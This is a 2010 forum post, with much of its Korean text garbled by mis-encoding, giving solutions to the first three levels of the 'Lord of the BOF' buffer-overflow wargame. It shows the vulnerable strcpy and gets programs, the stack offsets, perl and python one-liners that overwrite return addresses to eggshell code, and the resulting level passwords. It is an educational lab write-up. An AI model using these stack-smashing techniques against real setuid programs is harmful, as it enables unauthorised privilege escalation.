http://www.hackerschool.org/HS_Boards/zboard.php?id=bof_fellowship&no=11 [º¹»ç]
CodeAche
Lord Of the BOF
-Over The Gate-
/* 1. gcc 2.91 ±¸ ½ºÅñ¸Á¶
2. \xff°¡ °è¼Ó 00À¸·Î µé¾î°¡¼
ÀÏ¹Ý setuidÆ÷ÇÔ egg½©ÄÚµå¼Ò½º¿¡ ¸¶Áö¸·
system("/bin/bash")¸¦ bash2·Î ¼öÁ¤ ÈÄ ½ÇÇà
*/
[GATE]
---------gremlin.c----------
int main(int argc, char *argv[])
{
char buffer[256];
if(argc<2){
printf("argv error\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
----------------------------
buffer sfp ret
256 4 4
attack-> 260byte + shell_address
----------------------------
[gate@localhost gate]$ ./gremlin `perl -e 'print "x"x260,"\x58\xfb\xff\xbf"'`
bash$ id
uid=500(gate) gid=500(gate) euid=501(gremlin) egid=501(gremlin) groups=500(gate)
PASS : hackers proof
[Cobolt]
---------cobolt.c----------
int main(int argc, char *argv[])
{
char buffer[16];
if(argc<2){
printf("argv error\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
----------------------------
buffer[16] sfp ret
16 4 4
attack-> 16byte+4+shell_address
----------------------------
[gremlin@localhost gremlin]$ ./cobolt `perl -e 'print "x"x20,"\x48\xfb\xff\xbf"'`
bash$ id
uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)
PASS : hacking exposed
[Goblin]
----------goblin.c---------
int main()
{
char buffer[16];
gets(buffer);
printf("%s\n", buffer);
}
--------------------------
cobolt¿Í ¿ÏÀüÈ÷ °°Àº ¹®Á¦ÀÓ.
´ÜÁö ÀÎÀÚ·Î ¹Þ´À³Ä gets·Î ¹Þ´À³Ä Â÷ÀÌ.
°í·Î
[cobolt@localhost cobolt]$ (python -c 'print "x"*20+"\x48\xfb\xff\xbf"';cat)|./goblin
id
uid=502(cobolt) gid=502(cobolt) euid=503(goblin) egid=503(goblin) groups=502(cobolt)
PASS : hackers proof
-------------------------------------------------------------------------------------------
¹öÆÛ
//gate -> gremlin
mkdir buffer
cd buffer
vi egg.c
eggshell ¼Ò½º ÀÔ·ÂÇÏ°í
gcc egg.c -o egg
./egg
cd ..
./gremlin $RET
my-pass
gremlin pass : hello bof world
//gremlin -> cobolt
mkdir buffer
cd buffer
vi egg.c
eggshell ¼Ò½º ÀÔ·ÂÇÏ°í
gcc egg.c -o egg
./egg
cd ..
./cobolt $RET
my-pass
//gremlin -> goblin
bash2
vi egg.c
eggshell ¼Ò½º ÀÔ·ÂÇÏ°í ( ¸ÇµÞºÎºÐ system("/bin/bash"); ¸¦ system("/bin/bash2"); ·Î ¼öÁ¤
gcc egg.c -o egg
./egg
( printf $RET;cat)|./goblin
id
my-pass
ÀÌ°Ô Á¦°¡ Ç®¾ú´ø ¹æ¹ýÀÔ´Ï´Ù.
±â¾ïÀÌ °¡¹°°¡¹° ¤»¤» ½ºÆ縵 Ʋ¸°°ÍÀº ÀÌÇØÇØ Áֽø®¶ó ¹ÏÀ¸¸é¼ ..
-------------------------------------------------------------------------------------------
¿µºó
-- gremlin --
buf : ebp-256
egg : bffffd18
../gremlin `python -c 'print "A"*260 + "\x18\xfd\xff\xbf"'`
hello bof world
-- cobolt --
buf : ebp-16
egg : bffffcf8
../cobolt `python -c 'print "A"*20 + "\xf8\xfc\xff\xbf"'`
hacking exposed
-- goblin --
buf : ebp-16
egg : bffffd08
(python -c 'print "A"*20 + "\x08\xfd\xff\xbf"';cat) | ../goblin
hackers proof
ÀÌ·¸°Ô Ç®¾ú½À´Ï´Ù~
À̹ø¿¡ setuid °¡ °É¸° binary ´Â ±ÇÇÑ ¶§¹®¿¡ µð¹ö±ë ¸øÇÏ´Â Áö óÀ½ ¾Ë¾Ò³×¿ä...
|
Hit : 4069 Date : 2010/02/26 07:18
|